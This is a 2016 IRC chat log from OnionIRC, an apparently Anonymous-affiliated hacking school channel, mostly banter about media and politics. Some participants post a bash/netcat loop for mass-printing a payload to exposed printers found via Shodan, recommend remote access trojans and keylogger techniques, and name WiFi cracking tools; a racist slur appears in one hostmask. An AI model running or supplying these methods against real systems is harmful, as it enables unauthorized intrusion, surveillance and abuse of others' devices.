Content-Type: text/x-zim-wiki
Wiki-Format: zim 0.4
Creation-Date: 2016-04-23T00:56:13+08:00

====== main ======
Created 星期六 23 四月 2016

160423.125419
下午11:51:26 - The topic for #main is: Welcome to OnionIRC! | Don't give out personal information | join #support if you need help | Archive of old lessons & tools: https://mega.nz/#F!iFIhTLQR!WY8H_vjm5DZomqNVToL9OA | Classes start Sunday!!! | Chinese channel /join #中国一号 .
下午11:51:27 - ad3pt: has primary school taught you people nothing?
下午11:51:28 - Channel mode +ntrTCf set by Onion.IRC.
下午11:51:33 - Leo: guys i started this question so let me end it, we will precisely use the time zone of Jupiter and calculate it using a flux capacitor, everyone with me?
下午11:51:36 - pennyfortheguy [chatzilla@localhost] entered the room.
下午11:51:40 - XxxGodLesAnonxxX: ban them butts
下午11:51:48 - butts: no need to ban them
下午11:51:50 - XxxGodLesAnonxxX: wb pennyfortheguy
下午11:51:52 - butts: they can't even connect to the network
下午11:51:54 - butts: hello pennyfortheguy
下午11:51:55 - nightsin: ad3pt Nope, just how to be a criminal..
下午11:51:56 - botnet: nope, just say these systems
下午11:52:03 - sanity: yes do they give me a bad name butts
下午11:52:03 - ad3pt: Leo: you're using that flux capacitor totally wrong
下午11:52:15 - OnionIRC: I will just make a chart of all timezones
下午11:52:15 - XxxGodLesAnonxxX: lolzzzad3pt
下午11:52:18 - Leo: flux capacitors can be used for anything
下午11:52:21 - OnionIRC: it's fine
下午11:52:22 - Leo: you have no imagination ....
下午11:52:24 - butts: whose bot is botnet
下午11:52:26 - acrid_nerve: i like north korea time
下午11:52:41 - sanity: Hi Batman's Butler
下午11:52:41 - XxxGodLesAnonxxX: not mine i don't have a bot
下午11:52:42 - pennyfortheguy: Thanks,John Zorabedian - https://nakedsecurity.sophos.com/2016/04/22/anonymous-launches-onionirc-a-school-for-hacktivists-on-the-dark-web/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed:+nakedsecurity+%28Naked+Security+-+Sophos%29
下午11:52:43 - hairybob: and thus in some capacity the lurking reporters are accurate ;)
下午11:52:57 - Leo: Kim Jong-un is my dad :>
下午11:53:04 - OnionIRC: pennyfortheguy: another copypaste journalist though
下午11:53:09 - An0nh4x0r [An0nh4x0r@localhost] entered the room.
下午11:53:13 - e150d [e150d@localhost] entered the room.
下午11:53:13 - Mode +v for e150d set by ChanServ.
下午11:53:15 - OnionIRC: there is no way there are 10 to 20 people in here
下午11:53:16 - rosedingo36 [Instantbir@localhost] entered the room.
下午11:53:23 - XxxGodLesAnonxxX: lol Leo that's not a cool dad
下午11:53:24 - An0nh4x0r has left the room (Quit: Read error).
下午11:53:30 - Users connected from locations matching *!*ruski@localhost have been banned by butts.
下午11:53:30 - Channel mode +b set by butts.
下午11:53:30 - botnet has been kicked by butts.
下午11:53:34 - OnionIRC: in fact 90 people are chatting at the moment
下午11:53:42 - OxED: 89
下午11:53:44 - An0nh4x0r [An0nh4x0r@localhost] entered the room.
下午11:53:48 - Leo: OnionIRC, you still haven't realized the media lies?
下午11:53:58 - butts: media lies, but mostly the media is lazy
下午11:54:02 - hairybob: nope, but the chaos factor is rampant :D
下午11:54:02 - eyakilak: ^
下午11:54:11 - eyakilak: willfully ignorant, you might say
下午11:54:12 - pennyfortheguy: @0nionIRC .. Media .. Getting better though ..Slowly
下午11:54:14 - butts: reporters are under a lot of pressure from their companies to pump out story after story, constantly
下午11:54:18 - eyakilak: OnionIRC you're so buttmad
下午11:54:18 - butts: without proper reserach
下午11:54:20 - jhon: media is froud...
下午11:54:21 - butts: research*
下午11:54:23 - e150d has left the room (Part).
下午11:54:23 - An0nh4x0r has left the room (Quit: Read error).
下午11:54:23 - Leo: they don't wanna spend time in their stories, they just want that money
下午11:54:27 - OnionIRC: I love journalism
下午11:54:33 - eyakilak: journalism is not the news
下午11:54:33 - OnionIRC: I will defend it forever
下午11:54:37 * eyakilak shoves OnionIRC
下午11:54:42 - XxxGodLesAnonxxX:  Back to training
下午11:54:50 - OnionIRC: the news SHOULD BE JOURNALISM
下午11:54:52 - OnionIRC: :p
下午11:54:57 - Leo: Journalism and "The Media" are different
下午11:54:58 - XxxGodLesAnonxxX: afk
下午11:55:07 - ad3pt: butts - I hope the instructors know that it is customary prior to any and ALL lessons to ask that the feds in the room to stand up and introduce themselves
下午11:55:10 - OnionIRC: it should be synonymous
下午11:55:16 - XxxGodLesAnonxxX: amen to That OnionIRC
下午11:55:25 - pennyfortheguy: Amyway .. How the fuck is everybody?
下午11:55:27 - Leo: http://www.foxnews.com/world/2016/04/22/kim-jong-un-broadcasts-master-chef-style-cooking-competition-while-north-korea-starves.html look what my dad is doing :'(
下午11:55:36 - eyakilak: OnionIRC too bad that you live in a fantasy world that doesn't exist <3
下午11:56:02 - pennyfortheguy: LOL>>FAUX NEWS
下午11:56:02 - P0ss1net: Mr Pierluigi Pagani has bringing me here btw, thanks http://securityaffairs.co/wordpress/46509/hacktivism/anonymous-presented-onionirc.html
下午11:56:29 - imas: 9n8 7n<<<<<<<<<<989 8
下午11:57:04 - z5c95: (∩_∩)
下午11:57:14 - Leo: guys, we should change the world
下午11:57:23 - hunter: we will
下午11:57:39 - hairybob: the World will change w/o our help or guidance ;)
下午11:57:40 - ad3pt: Leo: it starts Sunday
下午11:57:42 - jhon: we will
下午11:57:46 - Leo: its going into full Totalitarianism
下午11:57:55 - hairybob: what tieme Sunday will the World change?
下午11:58:06 - pennyfortheguy: Thanks P0ss1net .. I missed that one
下午11:58:08 - Leo: 9:32pm GMT
下午11:58:13 - Leo: exactly hairybob
下午11:58:17 - ad3pt: hairybob: check your local listings
下午11:58:22 - P0ss1net: yw pennyfortheguy
下午11:58:36 - hairybob: :)
下午11:59:02 - pacman [user@localhost] entered the room.
下午11:59:09 - Mode +v for Obliterate set by ChanServ.
下午11:59:17 - pennyfortheguy: Sunday start now.. OK
下午11:59:24 - imas: while i read your time zone arguments neighbours kid peed all over my house :(
下午11:59:28 - Obliterate: Hello everyone!
下午11:59:36 - hunter: hi mate
下午11:59:43 - pennyfortheguy: hi Obliterare
下午11:59:44 - Loki_F [nyx@localhost] entered the room.
下午11:59:45 - jhon: hey dude
下午11:59:54 - P0ss1net: hi Obliterate
下午11:59:55 - ad3pt: a lot of this stuff will be announced thru @OnionIRC on twitter. if you're not following, you might want to do so.
下午11:59:56 - acrid_nerve: get some pet deodorizer
上午12:00:07 - Obliterate: When do we start learning how to hack all the things?
上午12:00:13 - OnionIRC: butts: even when you're printing story after story you can still do journalism, look at the intercept
上午12:00:14 - imas: lol
上午12:00:14 - Leo: lmfao, FBI spent $1.3 mil to break into the San Bernardino Shooter's iphone, while children in africa are dying of starvation..
上午12:00:28 - OnionIRC: spot on Leo
上午12:00:33 - sanity: yawn
上午12:00:38 - jhon: pointed leo
上午12:00:41 - Leo: thats why i've given up on this world xD
上午12:00:44 - imas: what if that is just for pr?
上午12:01:12 - rose [Instantbir@localhost] entered the room.
上午12:01:23 - OnionIRC: hey rose
上午12:01:35 - rose: hey
上午12:01:35 - imas: people will think apple is secure and wont fbi for watching everybodys phone
上午12:01:39 - sanity: someone draw perhaps
上午12:01:42 - ad3pt: Leo: the FBI spent $1.3 million while children are starving in America
上午12:01:44 - imas: wont hate*
上午12:01:49 - pennyfortheguy: @OnionIRC .. Yes,exactly .. Glenn Greenwald knows his hit .. Good hard honest research
上午12:02:04 - pennyfortheguy: *shit
上午12:02:07 - butts: literal metric tons of food are thrown away every day because capitalism doesn't feed the hungry it feeds those with money
上午12:02:15 - Leo: ad3pt children starve to death in America? dafuq o.0
上午12:02:16 - OnionIRC: spot on butts
上午12:02:26 - butts: yes Leo
上午12:02:27 - OnionIRC: :p
上午12:02:30 - eyakilak: every dya
上午12:02:31 - eyakilak: ay*
上午12:02:32 - eyakilak: day....
上午12:02:34 - eyakilak: fml
上午12:02:36 - rosedingo36 has left the room (Quit: rosedingo36).
上午12:02:39 - Leo: wtf? really? never heard such a thing
上午12:02:40 - eyakilak: Children are also forced into arranged marriages here.
上午12:02:42 - jhon: ohh
上午12:02:49 - jhon: it is true?
上午12:02:51 - eyakilak: And there is even Female Genital Mutilation that occurs.
上午12:02:56 - butts: over 15 million children in the USA live in homes that are incapable of feeding them properly
上午12:02:57 - Leo: thats more believable tho eyakilak
上午12:03:07 - butts: and there are plenty more who don't have a home to live in
上午12:03:10 - eyakilak: ^
上午12:03:15 - sanity: children starve everywhere it is tears
上午12:03:23 - jhon: media would not show this!
上午12:03:25 - Leo: butts but do they die of starvation?
上午12:03:29 - eyakilak: Yes.
上午12:03:36 - sanity: some media does
上午12:03:37 - ad3pt: Flint, Michigan water supply... need we say more?
上午12:03:38 - Leo: #That'sFucked
上午12:03:49 - sanity: leo yes
上午12:03:55 - butts: it's good that flint is at least finally getting the attention it deserves
上午12:04:00 - Leo: ad3pt, whats wrong with the water supply?
上午12:04:03 - pennyfortheguy: @ad3pt - Agree
上午12:04:12 - eyakilak: It's full of lead
上午12:04:15 - eyakilak: ^ leo
上午12:04:18 - Leo: f:O
上午12:04:19 - eyakilak: It's not just Flint, either
上午12:04:21 - OnionIRC: Greece just crashed again
上午12:04:23 - eyakilak: Nor is it just Lead.
上午12:04:28 - Leo: ok ok ok guys calm down
上午12:04:29 - butts: apparently the FDA says that 1 in every 6 people in the USA is facing food insecurity
上午12:04:31 - ad3pt: Leo: Flint Michigan is a 3rd world country inside the United States
上午12:04:45 - Leo: this world is fucked, and we need to get to work to fix it & protest this shit
上午12:04:45 - pennyfortheguy: Greece AGAIN! Fuck!
上午12:05:01 - Loki_F has left the room (Quit: Ping timeout: 240 seconds).
上午12:05:04 - hairybob: I think we can all agree that each area has similar problems and it can usually be traced back to those with money driving
上午12:05:05 - Gaz77 has left the room (Quit: This computer has gone to sleep).
上午12:05:22 - Leo: ad3pt dafauq ? why have i never heard any of this...
上午12:05:24 - ad3pt: someone really needs to get on that Clinton Transcript leak, for starters
上午12:05:29 - lemen: Blocking ad blockers is now illegal in EU
上午12:05:33 - butts: it traces many places hairybob. those with the money, and those without who are unwilling to change it
上午12:05:37 - lemen: TAKING THE INTERNET BACK
上午12:05:40 - butts: Classes will begin Sunday night (USA time), exact time is to be determined. This will be a basic entry level course covering the topic of anonymity & how to maintain privacy online. Operating systems, encryption, tor/vpn/tunnels, privacy applications & addons, cryptocurrency & more will be covered.
上午12:05:43 - ad3pt: Leo: corporate medie doesn't want you to know
上午12:05:51 - hairybob: agreed
上午12:05:54 - Loki_F [nyx@localhost] entered the room.
上午12:06:16 - pennyfortheguy: Thanks butts
上午12:06:29 - rijndael has left the room (Quit: Ping timeout: 240 seconds).
上午12:06:45 - Leo: ad3pt i get that :/
上午12:06:52 * XxxGodLesAnonxxX is now playing: Flux Pavilion vs Jay-z Feat Kanye West - Night in Paris (GOORSHKY! Mashup)
上午12:06:53 - Leo: #OpFuckTheMedia xD
上午12:06:54 - sanity: http://johnpilger.com STARVATION IN AUSTRALIA: UTOPIA'S DIRTY SECRET
上午12:07:26 - Obliterate: butts: Will there be a log of the lesson for those who couldn't participate?
上午12:07:33 - butts: yes Obliterate
上午12:07:34 - Leo: yes Obliterate
上午12:07:34 - rose has left the room (Quit: Ping timeout: 240 seconds).
上午12:07:37 - jhon: every country facing same problems
上午12:07:37 - pennyfortheguy: Leo .. Not all media is corrupt,my friend
上午12:07:38 - XxxGodLesAnonxxX: Yea Leo
上午12:07:49 - OnionIRC: we will have logs and a bot will spam previous lessons
上午12:07:52 - butts: i will be formatting the class log to remove all names and we will make it publicly available
上午12:07:53 - Leo: pennyfortheguy, majority
上午12:08:03 - ad3pt: corporat media wants to perpetuate the false belief that life is only sustainable when you learn what they want you to learn, then enslave yourself in debt
上午12:08:08 - XxxGodLesAnonxxX: most of them do pennyfortheguy
上午12:08:14 - OnionIRC: the point is
上午12:08:19 - OnionIRC: we make our own news
上午12:08:21 - Obliterate: That's good stuff
上午12:08:27 - pennyfortheguy: The last thing that we want to do is to go to war with the media
上午12:08:32 - jhon: yeah.
上午12:08:32 - OnionIRC: our reach is huge and our community is enormous
上午12:08:39 - jhon: OnionIRC
上午12:08:46 - Leo: would you guys trust thehackernews.com
上午12:08:51 - Leo: as a valid source
上午12:08:55 - Sith has left the room (Quit: Read error).
上午12:09:07 - butts: THN is ran by a public community
上午12:09:11 - XxxGodLesAnonxxX: i like to read tweakers
上午12:09:12 - OnionIRC: always judge per article
上午12:09:22 - Sith [Instantbir@localhost] entered the room.
上午12:09:23 - pennyfortheguy: Hackers News could do with pulling it''s fucking socks up.for sure
上午12:09:24 - pacman has left the room (Quit: Read error).
上午12:09:29 - eyakilak: OnionIRC meh
上午12:09:29 - butts: don't take any source at face value
上午12:09:31 - ad3pt: yes OnionIRC yes
上午12:09:37 - eyakilak: Says the person spouting praise of the intercept
上午12:09:46 - pacman [user@localhost] entered the room.
上午12:09:55 - butts: the intercept does pretty good work.
上午12:09:56 - eyakilak: :P If all news can do good, all news must be able to do bad, as well
上午12:09:58 - ad3pt: question the motives of every story you're told
上午12:10:01 * Leo calls "shots fired"
上午12:10:10 - butts: yes eyakilak that is kind of the point
上午12:10:26 - OnionIRC: ^
上午12:10:29 - pennyfortheguy: I Have the utmost respect for Glenn Greenwald
上午12:10:38 - eyakilak: Everyone has bias.
上午12:10:39 - OnionIRC: free press is something anon has always praised
上午12:10:44 - OnionIRC: that includes bs articles
上午12:10:46 - eyakilak: Including Glenn Greenwald.
上午12:10:47 - butts: i'd say the aware observer, though, realizes the intercept does more consistently solid research than any number of outlets we could name
上午12:10:55 - ad3pt: if someone tells you something, question who benefits from you believing what they're saying
上午12:11:07 - Obliterate: Yo butts, could I get my nick verified?
上午12:11:17 - sanity: yes butss
上午12:11:20 - butts: Obliterate: done
上午12:11:22 - sanity: buts+
上午12:11:22 - tucidides [Instantbir@localhost] entered the room.
上午12:11:26 - Obliterate: Thanks
上午12:11:28 - sanity: butts*
上午12:11:28 - eyakilak: That's true, but getting things wrong and leaving stuff out can be evils of the same intensity.
上午12:11:29 - Lulz [Nigger@Niggersinthekfc] entered the room.
上午12:11:29 - Mode +v for Lulz set by ChanServ.
上午12:11:45 - ad3pt: agreed eyakilak
上午12:11:47 - Lulz: sup
上午12:11:49 - XxxGodLesAnonxxX: hi Lulz
上午12:11:54 - sanity: Hi Lulz
上午12:11:56 - ad3pt: g'day Lulz
上午12:12:05 - P0ss1net: hi Lulz
上午12:12:09 - Leo: butts, can you give me OP
上午12:12:13 - butts: :p
上午12:12:19 - Leo: <3
上午12:12:21 - XxxGodLesAnonxxX: lol
上午12:12:34 - Lulz: so weev used a bash one liner to print swistikas on the internet
上午12:12:34 - pennyfortheguy: At least Glenn Greenwald has some fucking integrity
上午12:12:35 - sanity: thanks Butts for getting my nick verifie
上午12:12:36 - Leo: I'll be a good boy I promise
上午12:12:48 - eyakilak: lulz yes, and?
上午12:12:51 - Lulz: I wounder if it would be hard to do the same thing
上午12:12:54 - eyakilak: LMAO
上午12:12:59 - Lulz: but insted of swastikas
上午12:12:59 - eyakilak: he put the code he used
上午12:13:01 - eyakilak: the one line
上午12:13:02 - butts: lol
上午12:13:03 - eyakilak: he used
上午12:13:05 - eyakilak: on the internet
上午12:13:09 - eyakilak: if you wanna go fuck with it, have at it
上午12:13:11 - butts: just find his code
上午12:13:14 - eyakilak: Srsly.
上午12:13:15 - butts: and use shodan to find some more printers
上午12:13:18 - lemen has left the room (Quit: Read error).
上午12:13:19 - tucidides has left the room (Quit: Read error).
上午12:13:25 - tucidides [Instantbir@localhost] entered the room.
上午12:13:27 - imas has left the room (Quit: Leaving).
上午12:13:30 - zefawn [Instantbir@localhost] entered the room.
上午12:13:34 - butts: someone else used his poc and did it too
上午12:13:42 - butts: in another country, just recently
上午12:13:45 - Blo0d has left the room (Quit: Leaving).
上午12:13:45 - Lulz: LOL I wanna mass print bernie sanders flyers
上午12:13:49 - barracuda: 17:40:23             @eyakilak | who is doin wat nao
上午12:13:51 - barracuda: the girlfriend ;)
上午12:14:06 - P0ss1net: a good info ws with interesting articles sometimes, https://slashdot.org/
上午12:14:08 - Lulz: left or right
上午12:14:15 - ad3pt: ayyyy barracuda
上午12:14:50 - pennyfortheguy: Yeah .. Slashdot are OK
上午12:14:50 - Lulz: so if printers are massprinted
上午12:15:01 - Lulz: and the person is cought
上午12:15:02 - butts: slashdot still exists wow
上午12:15:04 - eyakilak: lulz: there are things weev did that make it legal, or at least, not illegal for what he did
上午12:15:07 - eyakilak: printing bernie spam would be illegal.
上午12:15:08 - lemen [lemen@localhost] entered the room.
上午12:15:12 - butts: slashdot was the reddit of its time
上午12:15:31 - eyakilak: barracuda: i'm so confused o.o
上午12:15:32 - P0ss1net: yeah
上午12:15:37 - ozcat [Instantbir@localhost] entered the room.
上午12:15:38 - Lulz: eyakilak, I woundered how he could admit to doing it
上午12:15:44 - Lulz: and not get v&
上午12:15:45 - jhon: hey plz explain printing bernie?
上午12:15:47 - OnionIRC: I once got a press release featured on both slashdot and the frontpage of reddit :D
上午12:15:58 - butts: Lulz: he lives in a non-extradition country
上午12:16:00 - mc2 [mc2@localhost] entered the room.
上午12:16:04 - Lulz: oh
上午12:16:08 - eyakilak: indeed.
上午12:16:08 - butts: OnionIRC: plz opsec
上午12:16:08 - Lulz: lol no wonder
上午12:16:13 - eyakilak: OnionIRC: you're so opsec
上午12:16:14 - eyakilak: lol
上午12:16:19 - zefawn has left the room (Quit: Read error).
上午12:16:26 - zefawn [Instantbir@localhost] entered the room.
上午12:16:28 - P0ss1net: you must pay attention to what is reported, but it is pretty much like every other place nowaday
上午12:16:29 - tucidides has left the room (Quit: Read error).
上午12:16:32 - tucidides [Instantbir@localhost] entered the room.
上午12:16:34 - hunter has left the room (Quit: Leaving).
上午12:16:51 - mc2: hey
上午12:16:55 - Lulz: I just wanna massspam printers to get cannabis legal
上午12:16:57 - P0ss1net: hi
上午12:17:03 - hunter [hunter@localhost] entered the room.
上午12:17:03 - Mode +v for hunter set by ChanServ.
上午12:17:14 - butts: Lulz: you should massspam legislators to put together decent legislation
上午12:17:24 - vor: wheres the one liner?
上午12:17:40 - pennyfortheguy: hey me2
上午12:18:18 - laputa has left the room (Quit: Read error).
上午12:18:22 - butts: #!/bin/bash
上午12:18:22 - butts: for i in `cat printers`
上午12:18:22 - butts: do
上午12:18:22 - butts: cat payload.ps |netcat -q 0 $i 9100
上午12:18:23 - butts: done
上午12:18:37 - pennyfortheguy: mc2 .. Sorry mate
上午12:18:47 - mc2: hehe np
上午12:18:58 - zefawn1 [Instantbir@localhost] entered the room.
上午12:19:10 - anon has left the room (Quit: Leaving).
上午12:19:23 - P0ss1net: for those who are looking for news about tooling, www.kitploit.com , it is not perfect but it does report some nice jewels
上午12:19:27 - vor: not bad
上午12:19:35 - butts: payload.ps contained the postscript printed
上午12:19:35 - OxED: Admins, why you created chinese channel, but other languages do not?
上午12:19:43 - pennyfortheguy: Thanks P0ss1net
上午12:19:55 - butts: OxED: anyone is allowed to make a channel
上午12:20:06 - butts: all you have to do is /join #whateverchannel and it is created
上午12:20:08 - Lulz: OxED, feel free to make a klingon channel
上午12:20:11 - P0ss1net: @pennyfortheguy yw
上午12:20:14 - OnionIRC: butts: according to storm going on efnet with a shell is more secure than going on here
上午12:20:15 - butts: there were a lot of chinese in here, so i made a chinese channel
上午12:20:24 - eyakilak_ [eyakilak@localhost] entered the room.
上午12:20:25 - butts: OnionIRC: just ignore him
上午12:20:25 - zefawn has left the room (Quit: Ping timeout: 240 seconds).
上午12:20:39 - eyakilak_: blah
上午12:21:15 - Lulz: lmao does badusb still work
上午12:21:19 - vor: why is storm always so salty
上午12:21:23 - OnionIRC: butts: 20k views
上午12:21:24 - tucidides has left the room (Quit: Read error).
上午12:21:26 - tucidides [Instantbir@localhost] entered the room.
上午12:21:30 - laputa [root@localhost] entered the room.
上午12:21:30 - eyakilak has left the room (Quit: Ping timeout: 240 seconds).
上午12:21:38 - ozcat has left the room (Quit: Ping timeout: 240 seconds).
上午12:21:39 - eyakilak_: nice OnionIRC
上午12:21:55 - pennyfortheguy: :-)
上午12:22:01 - tucidides has left the room (Quit: tucidides).
上午12:22:08 - zefawn1 is now known as zefawn.
上午12:22:09 - jhon: it is gud
上午12:22:38 - AnonCyberCy [User@localhost] entered the room.
上午12:22:38 - Mode +v for AnonCyberCy set by ChanServ.
上午12:22:54 - riki [Instantbir@localhost] entered the room.
上午12:23:11 - P0ss1net: for those who want to test skills legally and earn some money with try https://bugcrowd.com , it is a bug bounty program for corporations
上午12:23:14 - AnonCyberCy has left the room (Quit: Read error).
上午12:24:09 - riki: i m a beginner....plz tell me the pre-requisite for this learing program
上午12:24:10 - pennyfortheguy: Copy that P0ss1net .. nice
上午12:24:29 - AnonCyberCy [User@localhost] entered the room.
上午12:24:29 - Mode +v for AnonCyberCy set by ChanServ.
上午12:25:10 - P0ss1net: @pennyfortheguy yw
上午12:25:20 - riki: wat?
上午12:25:40 - butts: Classes will begin Sunday night (USA time), exact time is to be determined. This will be a basic entry level course covering the topic of anonymity & how to maintain privacy online. Operating systems, encryption, tor/vpn/tunnels, privacy applications & addons, cryptocurrency & more will be covered.
上午12:25:53 - OnionIRC has left the room (Quit: Read error).
上午12:26:21 - hairybob has left the room (Quit: hairybob).
上午12:26:25 - Daamus [Instantbir@localhost] entered the room.
上午12:26:36 - Daamus: hello
上午12:26:43 - AmoR [Instantbir@localhost] entered the room.
上午12:26:46 - jhon: hey riki
上午12:26:48 - jmc [Instantbir@localhost] entered the room.
上午12:26:58 - riki: will it be video classes? @butts
上午12:27:02 - pennyfortheguy: hey Daamus
上午12:27:06 - Daamus: yes?
上午12:27:12 - Daamus: oh hi
上午12:27:13 - OxED: At what time of night classes will begin?
上午12:27:13 - Daamus: lol
上午12:27:15 - hunter: sugest me a good working rat
上午12:27:22 - AnonCyberCy has left the room (Quit: Leaving).
上午12:27:43 - riki: i use porject neptune@hunter
上午12:27:50 - pennyfortheguy: np ;-)
上午12:28:18 - riki: any other u knw den tell me @hunter
上午12:28:19 - jhon has left the room (Quit: Read error).
上午12:28:27 - acrid_nerve has left the room (Quit: Read error).
上午12:29:07 - hunter: I was using Nanocore but i think its outdated now.
上午12:29:39 - riki: oh.....
上午12:29:48 - Kraully [Instantbir@localhost] entered the room.
上午12:30:02 - riki: any other remote keylogger u knw?
上午12:30:36 - hunter: there is a keylogger in the rats , dont need other softwere
上午12:30:48 - jmc: for android us keybord app
上午12:31:09 - riki: and any only keylogger?
上午12:31:11 - sucram has left the room (Quit: Leaving).
上午12:31:14 - hunter: is this a aplication or rats
上午12:31:17 - hunter: tools
上午12:31:17 - hunter: ?
上午12:31:21 - hunter: or malwere*
上午12:31:24 - OxED: keylogger can be write in C by 2 hours :)
上午12:31:25 - riki: lel
上午12:31:33 - mand [chatzilla@localhost] entered the room.
上午12:31:36 - APM [APM@localhost] entered the room.
上午12:31:36 - Mode +v for APM set by ChanServ.
上午12:31:51 - hunter: druidjack for android is rat
上午12:31:54 - hunter: and its fine
上午12:31:56 - riki: can u tell me how? @OxED
上午12:32:30 - hunter: there a much more skilled ppl from me in coding , so i use only working application, i dosent write them
上午12:32:33 - jmc: its droidjack bro...
上午12:32:47 - riki: or can u send me the code? @OxED
上午12:33:09 - P0ss1net has left the room (Quit: Ping timeout: 240 seconds).
上午12:33:25 - Pain [Pain@localhost] entered the room.
上午12:33:27 - OxED: riki: write a little dll, with hooking PeekMsg function. Inject this dll to all user processes and profit
上午12:34:08 - Pain: newbie here :)
上午12:34:13 - riki: I am a beginner....not that much knowledge about coding
上午12:34:16 - ethereal [Instantbir@localhost] entered the room.
上午12:34:26 - acrid_nerve [acrid_nerv@localhost] entered the room.
上午12:34:27 - Mode +v for acrid_nerve set by ChanServ.
上午12:34:29 - ub1qu170u5 [User@localhost] entered the room.
上午12:34:29 - Mode +v for ub1qu170u5 set by ChanServ.
上午12:34:29 - root [chatzilla@localhost] entered the room.
上午12:34:40 - ub1qu170u5: Hello all
上午12:34:45 - jhon [chatzilla@localhost] entered the room.
上午12:34:48 - riki: yo man
上午12:34:55 - root: hi every one
上午12:34:57 - AmoR: hi
上午12:35:00 - riki: hello
上午12:35:07 - root: Great to see you all
上午12:35:07 - APM: greetings
上午12:35:16 - Pain: hi
上午12:35:16 - Daamus: Sorry, dumb question, the whole lulzsec group got caught right?
上午12:35:27 - riki: @OxED plz share me the code....i will edit it !
上午12:35:37 - APM: I wouldnt say "whole"
上午12:35:42 - root:  really excited to start learning from here
上午12:35:50 - OxED: riki: first keylogger you can write by using SetSindowsHookEx :) it's many samples in internel. use google
上午12:35:52 - Daamus: didn't the leader like leak all the other members info
上午12:36:06 - Tech-Know: no, he didn't know the info of the other members
上午12:36:16 - Daamus: then how did the rest get caught
上午12:36:23 - Leo: everyone was anonymous in lulzsec
上午12:36:30 - Daamus: yea I know
上午12:36:36 - Tech-Know: he helped the fbi in finding them through other methods
上午12:36:52 - Daamus: rip
上午12:36:58 - Tech-Know: i think the fbi got him to plan an attack on an fbi owned server
上午12:36:59 - Daamus: which one did it
上午12:37:08 - Daamus: sabu?
上午12:37:14 - Tech-Know: yeah, sabu
上午12:37:14 - Leo:  ^
上午12:37:18 - Leo: #FuckSabu
上午12:37:22 - Daamus: ugh
上午12:37:26 - OxED: riki: http://hackerthedude.blogspot.ru/2009/10/keylogger-in-c.html
上午12:37:55 - Tech-Know: all of the core members got caught afaik, i'm not sure how big the whole group was though
上午12:37:57 - APM: presstitutes http://www.mirror.co.uk/news/world-news/anonymous-launches-online-training-camp-7791120
上午12:37:59 - Daamus: wow they really turned him
上午12:38:24 - Daamus: "He later turned informant for the FBI, working with the agency for over ten months to aid them in identifying other hackers from Lulzsec and related groups."
上午12:38:38 - Tech-Know: Daamus: he was looking after his niece and nephew and didn't want to see them go into foster care because he's in jail
上午12:38:47 - Daamus: ahh
上午12:38:47 - hunter: how to add otr in hexchat
上午12:38:49 - Tech-Know: so he worked with the fbi for the kids
上午12:38:51 - root: can any one tell me if there's any way to exploit the web browsers hooked by beef but that are in offline state bt browser is being used??
上午12:38:55 - hunter: or otr plugin
上午12:38:55 - sanity has left the room (Quit: Read error).
上午12:38:59 - Tech-Know: i don't know what he would have done otherwise, though
上午12:39:06 - HeadCrash [HeadCrash@localhost] entered the room.
上午12:39:07 - Mode +v for HeadCrash set by ChanServ.
上午12:39:13 - Daamus: that is a tough decision
上午12:39:30 - Tech-Know: imo it was irresponsible to do that if he had kids he was looking after, regardless
上午12:39:39 - Daamus: true
上午12:39:43 - pennyfortheguy: This One's for DJ Derek. A kind and generous soul.For he will be forever missed. RIP Brother - https://youtu.be/BuZcYxnsgvc
上午12:39:48 - jmc: can wifi password can be hack
上午12:40:02 - zefawn: good morning guys
上午12:40:10 - Daamus: I guess he just weighed his loved ones over mass amounts of his own people
上午12:40:11 - zefawn: wifi can be hack
上午12:40:11 - ub1qu170u5: Morning zefawn
上午12:40:13 - Tech-Know: jmc: if it's protected with wep, yes. if it's protected with wpa it's more difficult
上午12:40:14 - Leo: jmc if you lend me ur mum yes
上午12:40:17 - AmoR: morning
上午12:40:19 - tr0ll [Instantbir@localhost] entered the room.
上午12:40:20 - Ulrisch [Ulrisch@For.Teh.Lulz] entered the room.
上午12:40:26 - Lulz: jmc, aircrack-ng
上午12:40:31 - Daamus: WEP is so ez lol
上午12:40:33 - jmc: Leo: fuck you
上午12:40:37 - zefawn: its same encryptio n and decryption process
上午12:40:37 - Daamus: lmao
上午12:40:49 - Lulz: jmc, wifite with or without wps pixie
上午12:40:50 - C0D3XGIGAS [C0D3XGIGAS@localhost] entered the room.
上午12:40:52 - Daamus: don't u need a wordlist for wpa or you can't hack it?
上午12:40:55 - acrid_nerve: jmc if its wpa/wpa2 and they are using wps then its trivia with reaper
上午12:40:55 - zefawn: have the lock and the key
上午12:41:02 - acrid_nerve: *trivial
上午12:41:04 - XxxGodLesAnonxxX: wepcrack-ng
上午12:41:04 - Lulz: jmc, evil twin attack
上午12:41:19 - XxxGodLesAnonxxX: orinoco drivers atheros
上午12:41:28 - Pain: hey can anyone can tell me more about hexchat?
上午12:41:29 - Lulz: XxxGodLesAnonxxX, didn't know there was a wepcrack
上午12:41:34 - OxED: http://www.wirelessdomination.com/how-to-crack-wpa2-wifi-password-using-reaver-wpa2/
上午12:41:39 - ub1qu170u5: Daamus: WOrdlist + rules
上午12:41:57 - tr0ll has left the room (Quit: tr0ll).
上午12:42:01 - root: bt reaver starts to time out after some time
上午12:42:04 - Tech-Know: you can do an offline attack with sampled wpa2 traffic
上午12:42:13 - Lulz: jmc, top-hat-sec.com has there cwsp class
上午12:42:23 - Lulz: all about cracking and securing wifi
上午12:42:45 - rijndael [rijndael@localhost] entered the room.
上午12:42:50 - XxxGodLesAnonxxX: WEPCrack - An 802.11
上午12:43:24 - XxxGodLesAnonxxX: wepcrack - WEPCrack is a tool that cracks 802.11 WEP encryption keys using the latest discovered weakness of RC4 key scheduling
上午12:43:37 - jhon: is it possible to exploit a pc over a different network wid meta?
上午12:43:59 - riki: No one near me uses WEP encription lol
上午12:44:02 - Lulz: XxxGodLesAnonxxX, I googled it
上午12:44:08 - OxED: In theory, many wifi hardware can be vulnerable by heartbleed in procedure of auth. So in memory we can read last key... But there is no any POCs :(
上午12:44:11 - XxxGodLesAnonxxX: okzy
上午12:44:13 - Sic3fooh has left the room (Quit: leaving).
上午12:44:20 - Tech-Know: you're best using wpa2 and generating a new password every month or so, however often you think it's possible for someone to bruteforce the password
上午12:44:21 - Sic3fooh [onionirc@localhost] entered the room.
上午12:44:28 - XxxGodLesAnonxxX: afk for training
上午12:44:29 - root: gyus any one to help me with BEEF XSS
上午12:44:32 - AmoR has left the room (Quit: Read error).
上午12:45:07 - Tech-Know: obviously it'll take longer with longer passwords
